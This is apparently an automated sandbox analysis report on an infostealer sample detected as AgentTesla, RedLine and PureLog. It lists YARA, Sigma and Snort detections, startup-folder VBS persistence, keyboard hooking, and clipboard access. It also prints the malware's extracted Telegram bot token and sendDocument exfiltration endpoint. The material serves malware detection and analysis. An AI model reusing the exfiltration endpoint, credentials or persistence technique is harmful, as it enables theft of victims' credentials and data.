11.2.RegSvcs.exe.29f1046.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x41922:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41994:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41a1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41ab0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41b1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41b8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41c22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41cb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.name.exe.3710000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.name.exe.3710000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.5490000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.5490000.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.5490000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.5490000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.5490000.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fb22:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fb94:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fc1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fcb0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fd1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fd8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fe22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3feb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
11.2.RegSvcs.exe.29f015e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.29f015e.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.29f015e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.29f015e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.29f015e.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x40a0a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x40a7c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x40b06:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x40b98:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x40c02:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x40c74:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x40d0a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x40d9a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.51d0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.51d0000.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.51d0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.51d0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.51d0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4280a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4287c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x42906:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42998:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42a02:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42a74:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42b0a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42b9a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.3d05d90.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.3d05d90.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.3d05d90.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.3d05d90.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.3d05d90.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3fb22:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3fb94:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3fc1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3fcb0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3fd1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3fd8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3fe22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3feb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.29f015e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.29f015e.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.29f015e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.29f015e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.29f015e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x4280a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4287c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x42906:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42998:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42a02:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42a74:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42b0a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42b9a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.RegSvcs.exe.3d05d90.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.RegSvcs.exe.3d05d90.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.RegSvcs.exe.3d05d90.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.RegSvcs.exe.3d05d90.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.RegSvcs.exe.3d05d90.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x41922:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41994:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41a1e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41ab0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41b1a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41b8c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41c22:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41cb2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 65 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5240, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5240, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 4260, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.8 - Destination IP: 149.154.167.220

Timestamp:	05/04/24-10:06:01.265819
SID:	2851779
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.8 - Destination IP: 149.154.167.220

Timestamp:	05/04/24-10:05:51.470808
SID:	2851779
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage?chat_id=7062552884"}
Source: RegSvcs.exe.4864.15.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Case_Your company bad driver Vehicle No.exe	Virustotal: Detection: 67%			Perma Link
Source: Case_Your company bad driver Vehicle No.exe	ReversingLabs: Detection: 60%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Case_Your company bad driver Vehicle No.exe

Joe Sandbox ML: detected

Source: Case_Your company bad driver Vehicle No.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3841331858.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3845657517.00000000042D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.3296361938.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.3296658216.0000000003830000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328159917.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.3328274117.0000000003950000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446492753.0000000004200000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000E.00000003.3446375928.0000000004060000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C14696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C14696
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C1C9C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1C93C FindFirstFileW,FindClose,	0_2_00C1C93C
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C1F200
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C1F35D
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C1F65E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C13A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C13A2B
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C13D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C13D4E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C1BF27
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00A24696
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_00A2C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2C93C FindFirstFileW,FindClose,	8_2_00A2C93C
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00A2F200
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00A2F35D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00A2F65E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00A23A2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00A23D4E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00A2BF27

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49708 -> 149.154.167.220:443
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49710 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c433b488Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c7120916Host: api.telegram.orgContent-Length: 887Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21cbde34e4Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21ccf06265Host: api.telegram.orgContent-Length: 887Expect: 100-continue

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C225E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C225E2

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c433b488Host: api.telegram.orgContent-Length: 918Expect: 100-continueConnection: Keep-Alive

Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.0000000003490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/
Source: RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.0000000003490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49710 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, cPKWk.cs

.Net Code: M4pTMxBfC

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C2425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00C2425A

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C24458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00C24458
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		8_2_00A34458

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

0_2_00C2425A

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

